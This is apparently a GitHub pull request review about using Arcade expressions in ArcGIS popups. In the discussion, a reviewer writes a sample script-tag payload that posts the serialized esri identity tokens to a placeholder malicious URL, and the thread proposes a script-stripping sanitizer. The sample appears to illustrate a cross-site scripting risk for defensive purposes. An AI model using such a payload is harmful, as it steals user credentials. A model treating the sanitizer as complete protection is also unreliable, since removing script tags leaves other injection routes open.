### PR TITLE
Use Arcade expressions in popups when possible to avoid modifying original attributes

### PR DESCRIPTION
**Pull request by tmcgee**
failover to old style (modify attributes) for older version of the API (< 3.21).
includes a flag `useExpression: false` to force using old style.
The flag is necessary for formatters that return stuff like html because expressions only return text..

### CODE REVIEW

**Comment by green3g** [comment]
I'm not sure how to try this out, it seems cool but like all esri popup things seems tricky to configure. What am I doing wrong? 
```javascript
                13: {
                    expressionInfos: [{title: 'Hey!', name: 'test-expression', expression: 'hey my name is s$feature.plan_id'}],
                    fieldInfos: [{
                        include: true,
                        fieldName: 'expression/test-expression'
                    }],
                },
```

**Comment by tmcgee** [comment]
Your expressionInfos array looks correct. NOTE that you can use arcade expressions as you have written with version 3.21. It does not require the enhancements included within this PR.

This PR is intended to leverage the arcade expressions engine so the `formatter` function we have supported in the past does not change the attributes when applying the formatter function. It specifically addresses the side effect mentioned in #650 

NOTE that I have not yet found a way to include HTML like a hyperlink within an arcade expression so links like in the directions example still do it the old way. This might be an intentional limitation for possible security concerns. Allowing the insertion of script tags is bad.

**Comment by green3g** [comment]
> Allowing the insertion of script tags is bad.

Yes, I agree, but I'm not sure how it would be possible other than if an app developer actually put something like this into the code.

```javascript
formatter(data){
    return '<script>$.post("/my-malicious-url/"+ JSON.stringify(window.esri.id.toJson() );</script>';
}
```

It _might_ also be possible for someone to put that code into a publicly editable feature layer, and if that feature layer's field gets rendered using a formatter, perhaps it would output a script tag that gets executed. I'm not really sure know though, is this something we should be concerned about?

**Comment by green3g** [comment]
Looks like arcgis server does do _some_ evaluation of the content, but perhaps we should also?

image

**Comment by tmcgee** [comment]
If there is a way, bad actors will find it.

Maybe we should do something like this:
``` javascript
function stripScripts(s) {
    var div = document.createElement('div');
    div.innerHTML = s;
    var scripts = div.getElementsByTagName('script');
    var i = scripts.length;
    while (i--) {
      scripts[i].parentNode.removeChild(scripts[i]);
    }
    return div.innerHTML;
}
```

for all formatter functions?

**Comment by tmcgee** [comment]
@roemhildtg further thoughts on this? any specific issues?

**Comment by green3g** [comment]
Nope, looks good, merging!

**Pull request merged**
